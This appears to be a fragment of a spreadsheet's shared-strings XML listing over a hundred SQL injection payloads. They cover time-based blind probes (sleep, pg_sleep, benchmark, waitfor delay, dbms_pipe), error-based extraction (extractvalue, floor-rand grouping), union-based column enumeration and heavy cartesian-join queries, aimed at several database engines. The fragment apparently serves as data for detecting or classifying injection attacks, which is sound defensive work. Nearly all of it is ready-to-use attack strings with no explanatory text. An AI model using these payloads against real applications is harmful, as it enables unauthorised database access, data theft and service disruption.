  <si>
    <t>1%" and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "ctdc" = "ctdc</t>
  </si>
  <si>
    <t>1%"  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-4287%"  )  )   union all select 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074#</t>
  </si>
  <si>
    <t>select  ( case when  ( 8350 = 7872 )  then 8350 else 8350* ( select 8350 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%" or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  as adzj where 5575 = 5575 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 'lijy' = 'lijy</t>
  </si>
  <si>
    <t>-7034'  )  )   )  union all select 4023#</t>
  </si>
  <si>
    <t>1%' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-1021 )  as erjh where 7845 = 7845 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>select  ( case when  ( 3336 = 9781 )  then 3336 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'kbvq' where 9279 = 9279 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 4436 = 8910,1,1/0 ) </t>
  </si>
  <si>
    <t>1' and  ( 3423 = 7789 ) *7789 and 'pdia' like 'pdia</t>
  </si>
  <si>
    <t>-2602' union all select 5715,5715,5715,5715,5715,5715,5715,5715,5715--</t>
  </si>
  <si>
    <t>1" where 4161 = 4161 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9988%" or elt ( 1032 = 1032,3623 )  and "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'mgrj' where 8514 = 8514 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>-5500' )  order by 1--</t>
  </si>
  <si>
    <t>1' )  as ulbr where 7233 = 7233 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'+ ( select zpns where 6922 = 6922 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   as zldh where 3302 = 3302 rlike  ( select  ( case when  ( 1481 = 5677 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-4900'  )  )   or 7208 = 3236</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'bzak' like 'bzak</t>
  </si>
  <si>
    <t>1'|| ( select 'zbdv' where 1618 = 1618 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>-3582' )  or 6872 = 6872 and  ( 'gyfj' = 'gyfj</t>
  </si>
  <si>
    <t>-9650' )  or 1390 = 3209</t>
  </si>
  <si>
    <t>1  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5150  )  )   )  union all select 5660,5660,5660#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'hube' = 'hube</t>
  </si>
  <si>
    <t>1 )  as kzyb where 7023 = 7023 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-7810 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1"  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  "qqky" like "qqky</t>
  </si>
  <si>
    <t>1%" union all select null#</t>
  </si>
  <si>
    <t>1'+ ( select 'ewlk' where 1078 = 1078 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1" and elt ( 1210 = 1210,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'adiv' from dual where 9842 = 9842 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'uqyt' = 'uqyt</t>
  </si>
  <si>
    <t>1%" )  and make_set ( 8403 = 8403,8899 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select aahc where 5436 = 5436 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) +'</t>
  </si>
  <si>
    <t>1" )  where 1833 = 1833</t>
  </si>
  <si>
    <t>1'  )  )   as vrwr where 3830 = 3830</t>
  </si>
  <si>
    <t>-3420 where 9681 = 9681 or make_set ( 2438 = 1977,1977 ) --</t>
  </si>
  <si>
    <t>1%' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'yvxg' = 'yvxg</t>
  </si>
  <si>
    <t>1' where 9961 = 9961 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( "rsru" = "rsru</t>
  </si>
  <si>
    <t>1  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  7594 = 7594</t>
  </si>
  <si>
    <t>1' )  as bagi where 1281 = 1281  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1 )  as wbcd where 9506 = 9506 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>select sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>-9700' )  or 8811 = 7862</t>
  </si>
  <si>
    <t>-3270" where 2144 = 2144 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>1'|| ( select 'agng' from dual where 3337 = 3337 rlike sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>1"  )  )   or sleep ( 5 )  and   (  (  "mcyv" = "mcyv</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 8732 = 6244 )  then 1 else 0x28 end  )  )   and  ( "unuk" = "unuk</t>
  </si>
  <si>
    <t>1  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1868  )  )   union all select 1859,1859--</t>
  </si>
  <si>
    <t>1  )  )   as svhd where 9761 = 9761</t>
  </si>
  <si>
    <t>select  ( case when  ( 1898 = 4705 )  then 1898 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  </t>
  </si>
  <si>
    <t>1' )  where 2852 = 2852</t>
  </si>
  <si>
    <t>1'+ ( select mfcd where 6757 = 6757 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) +'</t>
  </si>
  <si>
    <t>1'|| ( select 'hafu' where 6226 = 6226</t>
  </si>
  <si>
    <t>1 where 4448 = 4448 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>select case when 6555 = 7349 then 1 else null end--</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 )  as crsd where 5271 = 5271 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" where 7631 = 7631 and 4733 = 3439</t>
  </si>
  <si>
    <t>select case when 2930 = 7964 then 1 else null end--</t>
  </si>
  <si>
    <t>1 where 6523 = 6523 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as nnpe where 9720 = 9720 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7746'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1'  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-3525" where 3522 = 3522 union all select 3522,3522,3522,3522,3522,3522,3522,3522,3522#</t>
  </si>
  <si>
    <t>-2222' in boolean mode )  union all select 7649,7649,7649,7649,7649,7649,7649,7649--</t>
  </si>
  <si>
    <t>1' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'zspf' = 'zspf</t>
  </si>
  <si>
    <t>1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'ekla' = 'ekla</t>
  </si>
  <si>
    <t>1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 6824 = 6824</t>
  </si>
  <si>
    <t>-8095' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 9646 = 9646</t>
  </si>
  <si>
    <t>1'|| ( select 'homm' where 4937 = 4937 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 5995 = 9618 ) *9618 and   (  (   ( 'nagr' like 'nagr</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5336' )  where 8691 = 8691 or 3608 = 1887--</t>
  </si>
  <si>
    <t>1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) -- jdia</t>
  </si>
  <si>
    <t>-8136' )  union all select 1324,1324,1324,1324#</t>
  </si>
  <si>
    <t>-6215' )  or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'wdeu' like 'wdeu</t>
  </si>
  <si>
    <t>1'|| ( select 'mosp' where 6085 = 6085</t>
  </si>
  <si>
    <t>-6854" where 7794 = 7794 union all select 7794,7794--</t>
  </si>
  <si>
    <t>1' )  where 9006 = 9006 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 9538 = 9538</t>
  </si>
  <si>
    <t>1 where 1092 = 1092</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  # jmki</t>
  </si>
  <si>
    <t>select  ( case when  ( 3672 = 8360 )  then 3672 else 3672* ( select 3672 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  -- uslt</t>
  </si>
  <si>
    <t>1'+ ( select 'plcm' where 2141 = 2141 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-5802'  )  )   )  union all select 6286,6286,6286,6286#</t>
  </si>
  <si>
    <t>1 and  ( 3437 = 2271 ) *2271</t>
  </si>
  <si>
    <t>-8200%"  )  )   union all select 7538,7538,7538#</t>
  </si>
  <si>
    <t>-9392  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  2975 = 2975</t>
  </si>
  <si>
    <t>1 )  and sleep ( 5 )  and  ( 4855 = 4855</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1878 = 2513,1,1/0 ) </t>
  </si>
  <si>
    <t>1' )  where 2120 = 2120</t>
  </si>
  <si>
    <t>select  ( case when  ( 8234 = 2498 )  then 8234 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-7069 )  union all select 6638,6638,6638,6638,6638,6638--</t>
  </si>
  <si>
    <t>-8215%" )  union all select 3877,3877,3877,3877,3877,3877--</t>
  </si>
  <si>
    <t>1' where 9420 = 9420 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "kbex" like "kbex</t>
  </si>
  <si>
    <t>1%' and  ( 2439 = 2555 ) *2555 and '%' = '</t>
  </si>
  <si>
    <t>-6442"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1" where 2483 = 2483</t>
  </si>
  <si>
    <t>1'+ ( select ukwc where 3008 = 3008 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1"  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-3963" or 1224 = 5119</t>
  </si>
  <si>
    <t>1  )  )   )  and 9575 = 1640--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'cgou' like 'cgou</t>
  </si>
  <si>
    <t>1'|| ( select 'ocmk' from dual where 3961 = 3961 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>-8117' union all select 9945,9945,9945,9945,9945,9945,9945#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 3325 = 1767 )  then 3325 else 3325* ( select 3325 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'+ ( select zfpk where 9784 = 9784 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   and 8316 = 6410#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 8482 = 8482 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5229'  )  )   as tkqp where 9253 = 9253 or 9323 = 9323#</t>
  </si>
  <si>
    <t>-8327 where 7555 = 7555 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'awic' where 5227 = 5227</t>
  </si>
  <si>
    <t>1'+ ( select 'ovti' where 4243 = 4243 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) </t>
  </si>
  <si>
    <t>1" where 4366 = 4366 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-6906' where 1839 = 1839 union all select 1839,1839,1839,1839,1839--</t>
  </si>
  <si>
    <t>1' )  where 1424 = 1424 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1%' )  rlike  ( select  ( case when  ( 1210 = 8664 )  then 1 else 0x28 end  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "xwnw" = "xwnw</t>
  </si>
  <si>
    <t>1" where 3933 = 3933 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'odkr' = 'odkr</t>
  </si>
  <si>
    <t>-4428 )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 and make_set ( 8403 = 8403,8899 ) # zysq</t>
  </si>
  <si>
    <t>1" )  as eefe where 5290 = 5290 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1' )  as wnys where 6457 = 6457 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%'  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( 5220 = 5220</t>
  </si>
  <si>
    <t>1 )  where 1096 = 1096</t>
  </si>
  <si>
    <t>1 where 1062 = 1062 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'votg' where 5105 = 5105 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'odsl' like 'odsl</t>
  </si>
  <si>
    <t>-4168' )  union all select 2618,2618#</t>
  </si>
  <si>
    <t>-5866'  )  )   as phzq where 3803 = 3803 union all select 3803,3803,3803,3803,3803,3803,3803,3803--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6838 = 2866 )  then 6838 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   as drss where 2077 = 2077 and 7533 = 7533--</t>
  </si>
  <si>
    <t>-9208%"  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>-2964"  )  )   order by 1--</t>
  </si>
  <si>
    <t>1'|| ( select 'mobv' from dual where 6338 = 6338</t>
  </si>
  <si>
    <t>1"  )  )   as vtad where 3653 = 3653 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9558"  )  )   )  union all select 2935,2935,2935,2935,2935--</t>
  </si>
  <si>
    <t>1'+ ( select ejaj where 1651 = 1651 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t xml:space="preserve"> end# ckxq</t>
  </si>
  <si>
    <t>-4637" where 8354 = 8354 or 1186 = 2714--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 3673 = 3673</t>
  </si>
  <si>
    <t>1' )  and sleep ( 5 )  and  ( 'orxt' = 'orxt</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'zfrs' = 'zfrs</t>
  </si>
  <si>
    <t>1' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 'cysu' like 'cysu</t>
  </si>
  <si>
    <t>-8833'  )  )   union all select 3227,3227,3227,3227,3227--</t>
  </si>
  <si>
    <t>-9574' )  as rxym where 4719 = 4719 union all select 4719,4719,4719,4719,4719,4719,4719--</t>
  </si>
  <si>
    <t>-1072%"  )  )   or 3090 = 3539</t>
  </si>
  <si>
    <t>1" )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  </t>
  </si>
  <si>
    <t>1'+ ( select 'fqkk' where 9725 = 9725</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) +'</t>
  </si>
  <si>
    <t>-4280%"  )  )   )  union all select 7981,7981--</t>
  </si>
  <si>
    <t>1"  )  )   as esho where 8864 = 8864 order by 1--</t>
  </si>
  <si>
    <t>1%" or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'vcaf' like 'vcaf</t>
  </si>
  <si>
    <t>1 )  as ooex where 1087 = 1087 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  # irvm</t>
  </si>
  <si>
    <t>1' )  and sleep ( 5 )  and  ( 'xecl' like 'xecl</t>
  </si>
  <si>
    <t>1%" )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 7758 = 4792 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) -- huss</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'kkgt' = 'kkgt</t>
  </si>
  <si>
    <t>1' )  as tsge where 6970 = 6970</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-1408  )  )   union all select 5715,5715,5715,5715,5715,5715--</t>
  </si>
  <si>
    <t>1 where 8390 = 8390 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
